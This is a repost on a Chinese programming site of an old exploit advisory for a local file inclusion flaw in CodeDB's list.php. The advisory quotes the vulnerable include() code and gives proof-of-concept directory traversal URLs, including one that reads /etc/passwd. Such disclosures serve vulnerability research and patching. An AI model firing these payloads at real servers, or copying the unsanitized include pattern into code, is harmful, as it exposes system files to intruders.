欢迎来到福编程网，本站提供各种互联网专业知识！

手机版

微信关注

快捷导航: 正则表达式 AJAX相关黑客相关相关技巧 Mysql MsSql MsSql2005 MsSql2008 MariaDB Oracle Access SQLite PostgreSQL MongoDB DB2 Redis 数据库文摘数据库其它 LINUX RedHat/Centos Ubuntu/Debian Fedora Solaris 红旗Linux Unix/BSD 苹果MAC 麒麟系统注册表 BIOS 系统安装系统进程 Fireworks教程

广告商业广告，理性选择

您的位置：网站首页 > 无法确定分类

CodeDB (list.php lang) Local File Inclusion Vulnerability

发布时间：1970-01-01　作者：佚名　来源：互联网

标签：雪佛兰通用奢华劳斯莱斯旗舰版 64位收藏夹解调器

#################################################################################Name:CodeDB(list.phplang)LocalFileInclusionVulnerability#Author:cOndemned#Greetz:ZaBeaTy,str0ke,irk4z,GregStar,doctor

###############################################################################

#

# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability

# Author : cOndemned

# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*

#

###############################################################################

Source :

// list.php

2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol

7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension

8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d

Proof of Concept :

http://[host]/[codeDB_path]/list.php?lang=../readme.txt

http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd

http://[host]/[codeDB_path]/list.php?lang=../[local_file]

EoF.

上一篇：MFORUM 0.1a Arbitrary Add-Admin Vulnerability

下一篇：Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

广告商业广告，理性选择

网站首页

网络编程

数据库

操作系统

平面设计

网站运营

网络安全

电脑相关

手机学院

CodeDB (list.php lang) Local File Inclusion Vulnerability

相关推荐

文章分类

热门关键词

热门文章

最新更新